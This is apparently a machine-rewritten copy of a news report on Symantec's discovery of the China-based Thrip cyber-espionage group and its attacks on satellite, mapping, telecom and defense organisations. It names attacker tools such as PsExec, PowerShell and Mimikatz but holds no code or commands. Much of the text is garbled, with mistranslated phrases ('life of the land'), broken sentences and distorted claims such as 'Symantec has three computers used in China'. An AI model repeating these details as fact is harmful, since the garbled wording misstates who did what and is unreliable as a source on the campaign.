The Chinese group involved in the cyber-espionage against U.S. companies, report says

File photo.

(REUTERS/Kacper Pempel )

A “wide” cyber-espionage campaign has been launched by a China-based group known as Thrip, according to a Threat Intelligence report released by cybersecurity giant Symantec.

The attacks were first detected early this year, but a spokesman for Symantec, told Fox News that they have confirmed activity up to and including May.

Symantec has three computers used in China to launch the attacks. “Thrip is the motive is probably espionage, and the goals are in communication, spatial imaging, and defence sectors, both in the United States and Southeast Asia,” the report said.

(Thrip attack group: spying on the communications, mapping, and defense goals. Credit: Symantec)


Symantec declined to identify the companies.

Satellite operator focused

One of the most disturbing attack was aimed at a satellite operator, Symantec said.

“The attack of the group seemed especially interested in the operational side of the business, seeking out and infecting computers with software that monitors satellites, “Symantec said. “This puts us in that Thrip motives go beyond spying and can also disturbance.”

Another goal was the creation of an organization that is involved in spatial imaging and mapping. In this case, Thrip targeted computers with the MapXtreme GIS (Geographic Information System) as well as machines that run on the Google Earth Server and Garmin imaging software.

Other targets included three different telecom operators, all located in South east Asia.

“In all cases…it turned out that the telecom companies themselves and not their customers were the target of these attacks,” Symantec added.

There was also a defense contractor that was targeted. When asked by Fox News, Symantec would not elaborate on the nature of the threat, or the defense contractor’s identity.


Since 2013

In 2013, Symantec initially discovered the China-based Thrip espionage campaign. Since then, the group has changed tactics, Symantec said. Thrip is switched from the use of the custom malware on a mixture of custom malware and the so-called “life of the land” tools – that last one is what Symantec describes as the use of legitimate functions of the operating system and network management tools to compromise victims’ networks.This helps to mask a bad actor activity.

Some of these tools include PsExec, a Microsoft tool. The attackers were using the Microsoft software to try to remotely install the malware. “If we analyze the malware, we discovered that it is an updated version of the Trojan.Rikamanu, malware associated with Thrip,” Symantec said.

Another legitimate program is PowerShell, Microsoft’s scripting tool “that was used for the execution of commands to download payloads, traverse contaminated networks, and to carry out exploration,” said Symantec.

Other “free” tools are also used as Mimikatz, which is often used with evil intentions, change rights, export certificates, and recover Windows passwords.

To detect attacks, Symantec has developed a technology called Targeted Attack Analytics, or TAA, which uses artificial intelligence and machine learning to spot attackers employ tools that are seemingly innocent.

“It was a TASK that led us to the latest cyber espionage campaign that we have discovered,” Symantec said.

Follow us

Don't be shy, get in touch. We love meeting interesting people and making new friends.

Most popular